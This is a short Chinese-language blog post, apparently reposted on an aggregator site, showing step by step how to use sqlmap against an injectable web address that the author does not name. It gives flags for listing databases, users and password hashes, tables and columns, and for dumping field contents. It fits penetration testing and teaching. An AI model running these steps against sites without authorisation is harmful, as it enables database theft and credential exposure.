測試地址:因為涉及商業隱私，這里就不列啦

我這里用的是windows，并沒有用kali，所以需要使用sqlmap.py1.Sqlmap.py -u "網址" 網址存在注入點

可以看出有三個注入點，底下還有其他系統或數據庫信息

2.曝出數據庫名稱 --dbs

可以看出有三個數據庫

3.查看web當前使用的數據庫 --current -db

4.曝出web數據庫使用賬戶--current -user

5.列出數據庫所有賬戶--users

沒截…

6.曝出數據庫賬號和密碼--passwords

沒截…

7.列出數據庫中的表 -D XX --tables (-D：指定數據庫名稱 XX：數據庫名稱 --tables：列出該數據庫的表)

8.列出表中的字段 -D XX -T YY --columns （-D指數據庫名稱 XX指數據庫 -T指要列出字段的表 YY指數據庫中的表 --columns指字段）

9.曝字段內容 -D XX -T YY -C ”a,b,c” --dump (-D指數據庫名稱 XX指數據庫 -T指要列出字段的表 YY指數據庫中的表 -C指定要曝的字段 --dump將結果導出)

總結

以上是生活随笔為你收集整理的Sqlmap爆库命令的简单使用的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。